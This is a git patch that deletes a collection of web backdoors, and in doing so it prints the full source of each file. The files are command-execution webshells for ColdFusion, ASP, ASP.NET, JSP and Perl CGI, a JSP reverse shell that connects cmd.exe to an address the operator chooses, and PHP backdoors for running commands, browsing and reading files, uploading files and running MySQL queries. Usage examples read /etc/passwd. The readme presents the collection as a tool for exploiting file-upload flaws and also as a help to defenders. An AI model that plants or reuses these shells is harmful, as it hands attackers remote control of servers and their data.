From 669d752069beb4e148b30dae0b41ba24f45ea477 Mon Sep 17 00:00:00 2001
From: unix23 <unix23@389a61cb-3542-a87d-fe93-12be81370f99>
Date: Tue, 20 Apr 2010 17:41:07 +0000
Subject: [PATCH] added more shells to web-backdoors

---
 web-backdoors/wbc-v1b/cfexec.cfm          | 43 -----------
 web-backdoors/wbc-v1b/cmd-asp-5.1.asp     | 41 ----------
 web-backdoors/wbc-v1b/cmdasp.asp          | 55 --------------
 web-backdoors/wbc-v1b/cmdasp.aspx         | 42 -----------
 web-backdoors/wbc-v1b/cmdjsp.jsp          | 32 --------
 web-backdoors/wbc-v1b/jsp-reverse.jsp     | 91 -----------------------
 web-backdoors/wbc-v1b/perlcmd.cgi         | 34 ---------
 web-backdoors/wbc-v1b/php-backdoor.php    | 71 ------------------
 web-backdoors/wbc-v1b/readme.txt          | 36 ---------
 web-backdoors/wbc-v1b/simple-backdoor.php | 17 -----
 10 files changed, 462 deletions(-)
 delete mode 100644 web-backdoors/wbc-v1b/cfexec.cfm
 delete mode 100644 web-backdoors/wbc-v1b/cmd-asp-5.1.asp
 delete mode 100644 web-backdoors/wbc-v1b/cmdasp.asp
 delete mode 100644 web-backdoors/wbc-v1b/cmdasp.aspx
 delete mode 100644 web-backdoors/wbc-v1b/cmdjsp.jsp
 delete mode 100644 web-backdoors/wbc-v1b/jsp-reverse.jsp
 delete mode 100644 web-backdoors/wbc-v1b/perlcmd.cgi
 delete mode 100644 web-backdoors/wbc-v1b/php-backdoor.php
 delete mode 100644 web-backdoors/wbc-v1b/readme.txt
 delete mode 100644 web-backdoors/wbc-v1b/simple-backdoor.php
diff --git a/web-backdoors/wbc-v1b/cfexec.cfm b/web-backdoors/wbc-v1b/cfexec.cfm
deleted file mode 100644
index 80fb3db..0000000
--- a/web-backdoors/wbc-v1b/cfexec.cfm
+++ /dev/null
@@ -1,43 +0,0 @@
-<html>
-<body>
-
-<!-- Contributed by Kurt Grutzmacher () -->
-
-Notes:<br><br>
-<ul>
-<li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c &lt;command&gt;" or wherever cmd.exe is<br>
-<li>Options are, of course, the command line options you want to run
-<li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
-</ul>
-<p>
-<cfoutput>
-<table>
-<form method="POST" action="cfexec.cfm">
-<tr><td>Command:</td><td><input type=text name="cmd" size=50 
-  <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
-<tr><td>Options:</td><td> <input type=text name="opts" size=50 
-  <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
-<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4 
-  <cfif isdefined("form.timeout")>value="#form.timeout#"
-  <cfelse>value="5"</cfif>></td></tr>
-</table>
-<input type=submit value="Exec" >
-</FORM>
-
-<cfif isdefined("form.cmd")>
-<cfsavecontent variable="myVar">
-<cfexecute name = "#Form.cmd#"
-   arguments = "#Form.opts#" 
-   timeout = "#Form.timeout#">
-</cfexecute>
-</cfsavecontent>
-<pre>
-#myVar#
-</pre>
-</cfif>
-</cfoutput>
-</body>
-</html>
-
-<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->
-<!--    http://michaeldaw.org   04/2007    -->
diff --git a/web-backdoors/wbc-v1b/cmd-asp-5.1.asp b/web-backdoors/wbc-v1b/cmd-asp-5.1.asp
deleted file mode 100644
index c4b93db..0000000
--- a/web-backdoors/wbc-v1b/cmd-asp-5.1.asp
+++ /dev/null
@@ -1,41 +0,0 @@
-<%
-
-' ASP Cmd Shell On IIS 5.1
-' brett.moore_at_security-assessment.com 
-' http://seclists.org/bugtraq/2006/Dec/0226.html
-
-
-Dim oS,oSNet,oFSys, oF,szCMD, szTF
-On Error Resume Next
-Set oS = Server.CreateObject("WSCRIPT.SHELL")
-Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
-Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
-szCMD = Request.Form("C")
-If (szCMD <> "") Then
-  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
-  ' Here we do the command
-  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
-"""",0,True)
-  response.write szTF
-  ' Change perms
-  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
-everyone:F",0,True)
-  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
-End If 
-%>
-<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
-<input type=text name="C" size=70 value="<%= szCMD %>">
-<input type=submit value="Run"></FORM><PRE>
-Machine: <%=oSNet.ComputerName%><BR>
-Username: <%=oSNet.UserName%><br>
-<% 
-If (IsObject(oF)) Then
-  On Error Resume Next
-  Response.Write Server.HTMLEncode(oF.ReadAll)
-  oF.Close
-  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
-End If 
-
-%>
-
-<!--    http://michaeldaw.org   2006    -->
diff --git a/web-backdoors/wbc-v1b/cmdasp.asp b/web-backdoors/wbc-v1b/cmdasp.asp
deleted file mode 100644
index 31ba9a5..0000000
--- a/web-backdoors/wbc-v1b/cmdasp.asp
+++ /dev/null
@@ -1,55 +0,0 @@
-<%@ Language=VBScript %>
-<%
-  ' --------------------o0o--------------------
-  '  File:    CmdAsp.asp
-  '  Author:  Maceo <maceo @ dogmile.com>
-  '  Release: 2000-12-01
-  '  OS:      Windows 2000, 4.0 NT
-  ' -------------------------------------------
-
-  Dim oScript
-  Dim oScriptNet
-  Dim oFileSys, oFile
-  Dim szCMD, szTempFile
-
-  On Error Resume Next
-
-  ' -- create the COM objects that we will be using -- '
-  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
-  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
-  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-
-  ' -- check for a command that we have posted -- '
-  szCMD = Request.Form(".CMD")
-  If (szCMD <> "") Then
-
-    ' -- Use a poor man's pipe ... a temp file -- '
-    szTempFile = "C:\" & oFileSys.GetTempName( )
-    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
-    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
-
-  End If
-
-%>
-<HTML>
-<BODY>
-<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
-<input type=text name=".CMD" size=45 value="<%= szCMD %>">
-<input type=submit value="Run">
-</FORM>
-<PRE>
-<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
-<br>
-<%
-  If (IsObject(oFile)) Then
-    ' -- Read the output from our command and remove the temp file -- '
-    On Error Resume Next
-    Response.Write Server.HTMLEncode(oFile.ReadAll)
-    oFile.Close
-    Call oFileSys.DeleteFile(szTempFile, True)
-  End If
-%>
-</BODY>
-</HTML>
-
-<!--    http://michaeldaw.org   2006    -->
diff --git a/web-backdoors/wbc-v1b/cmdasp.aspx b/web-backdoors/wbc-v1b/cmdasp.aspx
deleted file mode 100644
index b420c87..0000000
--- a/web-backdoors/wbc-v1b/cmdasp.aspx
+++ /dev/null
@@ -1,42 +0,0 @@
-<%@ Page Language="C#" Debug="true" Trace="false" %>
-<%@ Import Namespace="System.Diagnostics" %>
-<%@ Import Namespace="System.IO" %>
-<script Language="c#" runat="server">
-void Page_Load(object sender, EventArgs e)
-{
-}
-string ExcuteCmd(string arg)
-{
-ProcessStartInfo psi = new ProcessStartInfo();
-psi.FileName = "cmd.exe";
-psi.Arguments = "/c "+arg;
-psi.RedirectStandardOutput = true;
-psi.UseShellExecute = false;
-Process p = Process.Start(psi);
-StreamReader stmrdr = p.StandardOutput;
-string s = stmrdr.ReadToEnd();
-stmrdr.Close();
-return s;
-}
-void cmdExe_Click(object sender, System.EventArgs e)
-{
-Response.Write("<pre>");
-Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
-Response.Write("</pre>");
-}
-</script>
-<HTML>
-<HEAD>
-<title>awen asp.net webshell</title>
-</HEAD>
-<body >
-<form id="cmd" method="post" runat="server">
-<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
-<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
-<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
-</form>
-</body>
-</HTML>
-
-<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
-<!--    http://michaeldaw.org   04/2007    -->
diff --git a/web-backdoors/wbc-v1b/cmdjsp.jsp b/web-backdoors/wbc-v1b/cmdjsp.jsp
deleted file mode 100644
index 63625af..0000000
--- a/web-backdoors/wbc-v1b/cmdjsp.jsp
+++ /dev/null
@@ -1,32 +0,0 @@
-// note that linux = cmd and windows = "cmd.exe /c + cmd" 
-
-<FORM METHOD=GET ACTION='cmdjsp.jsp'>
-<INPUT name='cmd' type=text>
-<INPUT type=submit value='Run'>
-</FORM>
-
-<%@ page import="java.io.*" %>
-<%
-   String cmd = request.getParameter("cmd");
-   String output = "";
-
-   if(cmd != null) {
-      String s = null;
-      try {
-         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
-         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
-         while((s = sI.readLine()) != null) {
-            output += s;
-         }
-      }
-      catch(IOException e) {
-         e.printStackTrace();
-      }
-   }
-%>
-
-<pre>
-<%=output %>
-</pre>
-
-<!--    http://michaeldaw.org   2006    -->
diff --git a/web-backdoors/wbc-v1b/jsp-reverse.jsp b/web-backdoors/wbc-v1b/jsp-reverse.jsp
deleted file mode 100644
index ae9a781..0000000
--- a/web-backdoors/wbc-v1b/jsp-reverse.jsp
+++ /dev/null
@@ -1,91 +0,0 @@
-// backdoor.jsp
-// http://www.security.org.sg/code/jspreverse.html
-
-<%@
-page import="java.lang.*, java.util.*, java.io.*, java.net.*"
-% >
-<%!
-static class StreamConnector extends Thread
-{
-        InputStream is;
-        OutputStream os;
-
-        StreamConnector(InputStream is, OutputStream os)
-        {
-                this.is = is;
-                this.os = os;
-        }
-
-        public void run()
-        {
-                BufferedReader isr = null;
-                BufferedWriter osw = null;
-
-                try
-                {
-                        isr = new BufferedReader(new InputStreamReader(is));
-                        osw = new BufferedWriter(new OutputStreamWriter(os));
-
-                        char buffer[] = new char[8192];
-                        int lenRead;
-
-                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
-                        {
-                                osw.write(buffer, 0, lenRead);
-                                osw.flush();
-                        }
-                }
-                catch (Exception ioe)
-
-                try
-                {
-                        if(isr != null) isr.close();
-                        if(osw != null) osw.close();
-                }
-                catch (Exception ioe)
-        }
-}
-%>
-
-<h1>JSP Backdoor Reverse Shell</h1>
-
-<form method="post">
-IP Address
-<input type="text" name="ipaddress" size=30>
-Port
-<input type="text" name="port" size=10>
-<input type="submit" name="Connect" value="Connect">
-</form>
-<p>
-<hr>
-
-<%
-String ipAddress = request.getParameter("ipaddress");
-String ipPort = request.getParameter("port");
-
-if(ipAddress != null && ipPort != null)
-{
-        Socket sock = null;
-        try
-        {
-                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
-
-                Runtime rt = Runtime.getRuntime();
-                Process proc = rt.exec("cmd.exe");
-
-                StreamConnector outputConnector =
-                        new StreamConnector(proc.getInputStream(),
-                                          sock.getOutputStream());
-
-                StreamConnector inputConnector =
-                        new StreamConnector(sock.getInputStream(),
-                                          proc.getOutputStream());
-
-                outputConnector.start();
-                inputConnector.start();
-        }
-        catch(Exception e) 
-}
-%>
-
-<!--    http://michaeldaw.org   2006    -->
diff --git a/web-backdoors/wbc-v1b/perlcmd.cgi b/web-backdoors/wbc-v1b/perlcmd.cgi
deleted file mode 100644
index 05ac4db..0000000
--- a/web-backdoors/wbc-v1b/perlcmd.cgi
+++ /dev/null
@@ -1,34 +0,0 @@
-#!/usr/bin/perl -w
-
-use strict;
-
-print "Cache-Control: no-cache\n";
-print "Content-type: text/html\n\n";
-
-my $req = $ENV{QUERY_STRING};
-	chomp ($req);
-	$req =~ s/%20/ /g; 
-	$req =~ s/%3b/;/g;
-
-print "<html><body>";
-
-print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
-
-	if (!$req) {
-		print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
-	}
-	else {
-		print "Executing: $req";
-	}
-
-	print "<pre>";
-	my @cmd = `$req`;
-	print "</pre>";
-
-	foreach my $line (@cmd) {
-		print $line . "<br/>";
-	}
-
-print "</body></html>";
-
-# <!--    http://michaeldaw.org   2006    -->
diff --git a/web-backdoors/wbc-v1b/php-backdoor.php b/web-backdoors/wbc-v1b/php-backdoor.php
deleted file mode 100644
index 7defd37..0000000
--- a/web-backdoors/wbc-v1b/php-backdoor.php
+++ /dev/null
@@ -1,71 +0,0 @@
-<?
-// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
-
-ob_implicit_flush();
-if(isset($_REQUEST['f'])){
-        $filename=$_REQUEST['f'];
-        $file=fopen("$filename","rb");
-        fpassthru($file);
-        die;
-}
-if(isset($_REQUEST['d'])){
-        $d=$_REQUEST['d'];
-        echo "<pre>";
-        if ($handle = opendir("$d")) {
-        echo "<h2>listing of $d</h2>";
-                   while ($dir = readdir($handle)){ 
-                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
-							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
-                       echo "$dir\n"; 
-                       echo "</font></a>";
-                }
-                       
-        } else echo "opendir() failed";
-        closedir($handle);
-        die ("<hr>"); 
-}
-if(isset($_REQUEST['c'])){
-	echo "<pre>";
-	system($_REQUEST['c']);		   
-	die;
-}
-if(isset($_REQUEST['upload'])){
-
-		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
-			else $dir=$_REQUEST['dir'];
-		$fname=$HTTP_POST_FILES['file_name']['name'];
-		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
-			die('file uploading error.');
-}
-if(isset($_REQUEST['mquery'])){
-	
-	$host=$_REQUEST['host'];
-	$usr=$_REQUEST['usr'];
-	$passwd=$_REQUEST['passwd'];
-	$db=$_REQUEST['db'];
-	$mquery=$_REQUEST['mquery'];
-	mysql_connect("$host", "$usr", "$passwd") or
-    die("Could not connect: " . mysql_error());
-    mysql_select_db("$db");
-    $result = mysql_query("$mquery");
-	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
-    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
-    mysql_free_result($result);
-	die;
-}
-?>
-<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
-<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
-upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
-<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
-<br>for example:
-http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
-or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
-<hr>execute mysql query:
-<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
-host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
-
-database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
-</form>
-
-<!--	http://michaeldaw.org	2006 	-->
diff --git a/web-backdoors/wbc-v1b/readme.txt b/web-backdoors/wbc-v1b/readme.txt
deleted file mode 100644
index f494291..0000000
--- a/web-backdoors/wbc-v1b/readme.txt
+++ /dev/null
@@ -1,36 +0,0 @@
-Web Backdoor Compilation (wbc)
-DK (http://michaeldaw.org) 
-
-Changelog
-Date Change 
-14 Apr 07 Version 1b (pre 1.2 release):
-perlcmd.cgi,
-cfexec.cfm,
-cmdasp.aspx 
-Dec/06 Version 1 release. 
-
-I have collected some WEB backdoors in the past to exploit
-vulnerable file upload facilities and others. I think a
-library like this may be useful in a variety of situations. 
-
-Understanding how these backdoors work can help security administrators implement firewalling and security policies to mitigate obvious attacks. 
-
-The package includes: 
-
-Filename Contributer MD5 
-cmd-asp-5.1.asp Brett Moore 8baa99666bf3734cbdfdd10088e0cd9f 
-cmdasp.asp Maceo 57b51418a799d2d016be546f399c2e9b 
-cmdasp.aspx Dominic Chell 5e83b6ed422399de04408b80f3e5470e 
-cmdjsp.jsp Unknown b815611cc39f17f05a73444d699341d4 
-jsp-reverse.jsp Tan Chew Keong 8b0e6779f25a17f0ffb3df14122ba594 
-php-backdoor.php z0mbie 2b5cb105c4ea9b5ebc64705b4bd86bf7 
-simple-backdoor.php David Kierznowski f091d1b9274c881f8e41b2f96e6b9936 
-perlcmd.cgi David Kierznowski 97ae7222d7f13e908c6d7f563cb1e72b 
-cfexec.cfm Kurt Grutzmacher bd04f47283c53ca0ce6436a79ccd600f 
-
-Note: readme.txt is also included in this package but not listed here. 
-
-If you have contributions please let me know so that I can add them into a later
-release. 
-
-
diff --git a/web-backdoors/wbc-v1b/simple-backdoor.php b/web-backdoors/wbc-v1b/simple-backdoor.php
deleted file mode 100644
index bc0e778..0000000
--- a/web-backdoors/wbc-v1b/simple-backdoor.php
+++ /dev/null
@@ -1,17 +0,0 @@
-<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
-
-<?php
-
-if(isset($_REQUEST['cmd'])){
-        echo "<pre>";
-        $cmd = ($_REQUEST['cmd']);
-        system($cmd);
-        echo "</pre>";
-        die;
-}
-
-?>
-
-Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
-
-<!--    http://michaeldaw.org   2006    -->

Command:	value="#form.cmd#">
Options:	value="#form.opts#">
Timeout:	value="#form.timeout#" - value="5">